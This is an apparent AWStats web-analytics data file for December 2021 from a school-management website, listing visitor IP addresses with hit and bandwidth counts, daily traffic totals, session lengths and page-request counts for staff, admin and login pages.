54.89.57.121 2 2 60850 20211215235701
35.165.17.48 1 1 6816 20211230045645
223.182.212.67 59 62 406127 20211227045157
34.211.215.172 1 1 6942 20211212030633
64.233.172.92 12 57 829727 20211230071240
106.217.28.113 53 72 258119 20211230023258
106.211.255.144 2 2 27128 20211203063114
106.197.45.65 16 47 488130 20211228100029
34.86.35.16 2 2 60850 20211210085113
106.211.255.138 78 78 153723 20211223071905
54.190.180.254 2 2 13884 20211220030436
106.198.126.87 47 99 16184432 20211230104421
64.233.173.189 0 3 14407 
117.213.132.158 30 35 203364 20211228124638
34.77.162.14 2 2 60850 20211227230359
223.187.123.41 67 77 11938263 20211228133819
192.99.18.136 12 12 44518 20211229134932
34.218.79.255 1 1 6942 20211210040059
54.212.187.28 1 1 6942 20211211032757
34.205.174.222 2 3 16330 20211221195449
52.88.100.156 1 1 6942 20211214032751
49.44.76.235 2 6 127318 20211220121215
54.185.96.119 1 1 6816 20211231032023
157.51.174.253 2 2 27128 20211207050452
34.220.76.6 1 1 6942 20211207034446
92.118.160.13 2 2 60850 20211227092918
157.49.128.226 88 160 3026298 20211229052758
157.46.106.93 12 31 12962758 20211230094826
52.37.235.235 2 2 13884 20211206035347
158.69.24.50 12 18 66814 20211227095053
157.49.252.91 28 56 5144675 20211230062903
205.185.116.25 2 2 13632 20211228155214
18.237.56.36 1 1 6942 20211209030642
157.46.66.100 57 174 12686609 20211228095754
75.15.244.98 2 2 13884 20211214121539
34.213.119.145 1 1 6942 20211202033548
34.212.21.198 1 1 6942 20211228033023
106.211.208.105 18 60 10409503 20211230071635
42.236.10.93 0 1 2446 
64.233.173.185 2 6 232721 20211225115715
223.187.117.128 13 16 71147 20211231112002
34.212.25.158 2 2 13884 20211213033353
157.46.125.13 84 97 11624115 20211229065207
116.74.91.4 2 6 127318 20211220121341
64.233.173.187 6 9 20966 20211230023046
23.106.28.236 2 2 13884 20211221173447
54.187.152.218 2 2 13884 20211205031624
106.211.255.158 23 60 720731 20211212071815
35.87.97.76 2 2 13884 20211216034017
209.141.36.112 0 1 110484 
68.183.1.60 2 2 4722 20211223045103
106.211.255.151 6 38 707113 20211231060502
157.49.69.86 62 84 1625002 20211229163521
92.118.160.57 6 6 182550 20211227091712
157.49.131.216 13 34 287155 20211229065202
18.197.107.32 1 1 0 20211210043716
167.94.138.44 2 2 13884 20211213144740
34.86.35.24 2 2 60850 20211221102437
157.51.94.139 12 17 74186 20211228131011
157.49.228.228 12 23 4203970 20211229103551
167.172.62.246 2 2 19990 20211223050448
103.46.233.132 2 6 127318 20211220121331
157.51.117.64 78 149 1340261 20211228094722
68.183.13.38 2 2 13884 20211228110311
106.197.123.19 67 102 1042215 20211229074354
157.49.133.45 52 76 532328 20211228095656
106.75.162.130 2 4 346498 20211215231616
167.71.4.78 3 3 10902 20211223062253
205.251.233.183 2 2 27130 20211227055914
157.46.94.247 23 98 1741871 20211228132533
157.49.255.236 26 30 132084 20211228094738
137.184.37.190 2 2 3158 20211223052640
106.197.44.14 50 78 1835705 20211229092739
92.118.160.17 2 2 60850 20211220112449
35.165.191.41 1 1 6942 20211213033428
64.233.172.94 14 55 680325 20211230061649
106.198.108.42 45 77 807298 20211230023725
34.86.35.13 2 2 60850 20211203084317
54.185.15.101 1 1 6816 20211230045840
223.187.122.121 8 11 36344 20211230124020
157.51.47.239 34 56 27462152 20211230063658
185.237.99.209 4 4 27768 20211227002734
34.221.29.37 2 2 13884 20211209030245
34.86.35.2 2 2 60850 20211215005800
5.161.55.232 2 2 7572 20211228122349
18.189.193.175 4 4 27768 20211227174243
106.198.110.74 46 84 908517 20211224141133
34.215.96.31 1 1 6942 20211208032823
106.198.115.104 22 54 520307 20211230040623
34.86.35.5 2 2 60850 20211208033941
104.149.137.98 0 2 116 
34.212.149.136 1 1 6942 20211208032859
106.197.109.61 46 63 2317155 20211230070522
54.218.129.79 1 1 6942 20211216034038
157.51.171.155 27 35 394555 20211211082712
106.211.208.86 56 97 1087778 20211228094407
157.49.199.214 12 14 66072 20211228100157
18.225.25.214 1 1 30425 20211213163930
147.182.164.49 2 2 4326 20211228234346
34.213.188.220 2 2 13884 20211211032652
157.46.96.225 24 59 16781816 20211230140037
35.164.186.154 1 1 6942 20211217042848
69.197.185.45 2 2 13884 20211201230549
35.221.12.65 2 2 13884 20211208174104
157.46.93.246 18 26 99786 20211230064446
106.217.3.62 26 64 885102 20211229063314
106.197.34.53 4 20 214715 20211228101502
157.49.140.38 8 8 35666 20211229051802
157.51.30.18 19 69 26909720 20211230041530
34.216.201.167 1 1 6942 20211206035420
111.94.35.196 0 1 76469 
157.51.186.224 90 129 727568 20211228094611
34.96.130.14 2 2 60850 20211209230456
35.88.244.207 1 1 6942 20211215034426
35.85.46.47 1 1 6942 20211219031505
223.182.221.40 50 128 3484888 20211230072519
202.21.43.75 2 33 733740 20211204152633
54.224.172.4 22 30 60221557 20211228013427
107.150.63.170 2 2 13884 20211205181252
106.211.208.89 29 63 824992 20211229073931
124.126.78.133 2 2 60850 20211210072015
34.212.195.22 2 2 13884 20211227033139
35.87.181.142 2 2 13884 20211228032951
20.92.75.186 2 2 13884 20211213135144
3.81.53.66 23 31 60233774 20211221155234
157.51.104.173 15 16 67321 20211229073639
157.46.91.177 18 21 88958 20211229051813
205.185.116.89 0 1 2446 
157.49.156.5 22 30 773199 20211230035837
157.46.90.75 2 7 129769 20211231053439
157.49.239.93 14 42 339791 20211229072251
34.77.162.21 2 2 60198 20211231041736
106.211.255.141 12 15 230096 20211217132427
157.46.91.51 10 21 9334868 20211230043105
54.212.38.224 1 1 6942 20211226032732
106.217.23.2 29 59 427493 20211230104345
167.172.62.217 2 2 4136 20211223060849
106.211.255.177 31 36 96809 20211229162151
35.167.247.164 1 1 6942 20211218035342
157.51.180.177 43 64 626848 20211211145150
106.197.45.19 66 72 830420 20211229084316
106.197.45.33 10 13 69469 20211229014935
54.186.122.85 1 1 6942 20211208031638
106.198.126.125 60 139 12534657 20211229111800
106.198.115.53 18 61 664506 20211228092342
34.210.242.5 2 2 13632 20211231031945
68.183.3.232 2 2 2512 20211223044509
34.96.130.29 2 2 60850 20211210130259
157.46.78.38 12 12 68530 20211230045829
52.12.103.204 2 2 13884 20211203032938
42.236.10.106 0 1 2446 
157.51.119.52 40 45 217194 20211229095551
157.51.131.218 32 113 2164741 20211230023108
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20211201 4 4 27768 2
20211202 58 98 1016920 6
20211203 10 10 223562 5
20211204 4 36 837337 2
20211205 41 41 214940 5
20211206 9 9 203376 5
20211207 5 5 47954 3
20211208 53 53 322494 10
20211209 7 7 108804 4
20211210 13 13 271168 8
20211211 241 391 4484070 7
20211212 33 103 1469503 6
20211213 19 19 302581 11
20211214 9 10 116386 5
20211215 20 22 612352 13
20211216 5 7 367324 3
20211217 15 18 250922 3
20211218 5 5 81676 3
20211219 50 87 1104131 6
20211220 558 588 4525013 14
20211221 35 44 60366490 8
20211222 241 274 2434912 4
20211223 106 144 950716 15
20211224 103 249 3497538 7
20211225 304 506 3987037 11
20211226 346 497 4244649 8
20211227 177 227 2280909 13
20211228 2319 3816 250607876 62
20211229 1440 2061 150404386 43
20211230 2603 3449 663926909 58
20211231 28 68 1081943 8
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
0s-30s 207
15mn-30mn 25
2mn-5mn 24
5mn-15mn 28
30s-2mn 31
30mn-1h 22
1h+ 21
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 56
/ 1489 12018619 281 160
/staffLogin.php 1334 2870351 22 77
/staffs/profile.php 1202 10702890 1 27
/staffs/ 1012 6733582 0 12
/validationAjax.php 906 904 0 4
/index.php 356 2433048 1 9
/admins/staffs/staffProfile.php 246 2318738 0 5
/login.php 236 488048 31 17
/admins/staffs/viewStaffs.php 198 1363014 0 0
/admins/examination/insertExam.php 160 881535 0 1
/admins/attendence/index.php 156 871114 0 0
/admins/examination/viewExaminations.php 130 734066 0 0
/admins/index.php 122 861056 0 6
/admins/settings/ 116 1127302 0 2
/admins/ 112 807524 0 3
/admins/attendence/insertAttendence.php 104 672205 0 3
/staffs/setpassword.php/ 102 166642 0 1
/admins/examination/updateMarks.php 80 487343 0 1
/admins/class/viewClass.php 66 405002 0 1
/admins/settings/index.php 66 667740 0 0
/admins/students/viewStudents.php 56 601256 0 2
/admins/class/classProfile.php 54 398714 0 1
/admins/attendence/ 42 206534 0 0
/staffs/index.php 38 248778 0 1
/admins/settings/bulkupload.php 35 38749 0 0
/admins/transport/addBus.php 6 37146 0 0
/cpanel 28 379816 7 7
/admins/accounts/addCheque.php 2 10496 0 0
/admins/students/createStudent.php 6 54982 0 0
/staffs/staffs/createStaff.php 2 17534 0 0
/admins/settings/staff_bulkupload.php 18 19512 0 0
/admins/settings/bulk_staffimport.php 9 2011 0 0
/admins/syllabus/createSyllabus.php 22 128864 0 2
/admins/students/feesConfirmation.php 1 305 0 0
/admins/syllabus/targetchapter.php 2 11846 0 0
/cgi-sys/404.html 1 583 0 0
/admins/accounts/createGeneralLedger.php 4 21572 0 0
/about-us.php 24 59832 2 2
/staffs/setpassword.php 10 17520 0 0
/aeromodellingBasic.php 16 60576 2 2
/admins/students/studentProfile.php 26 255394 0 0
/franchise.php 22 34738 2 2
/admins/settings/bukluploadsubmit.php 33 4959 0 0
/admins/staffs/validation.php 23 23 0 0
/staffs/setpassword.php/logout.php 27 43592 0 0
/parentsLogin.php 24 56664 2 3
/admins/staffs/createStaff.php 12 105364 0 0
/packages.php 18 22608 1 1
/testing.php 20 120 2 0
/admins/staffs/formSubmit.php 12 762 0 0
/admins/librarian-dashboard.php 2 13514 1 0
/admins/transport/ViewBus.php 4 23280 0 0
/Terms&Policy.php 18 179910 3 3
/requestReset.php 28 42364 0 3
/admins/staffs/1-A.php 1 1046 0 0
/admins/examination/createExamination.php 22 133230 0 0
END_SIDER
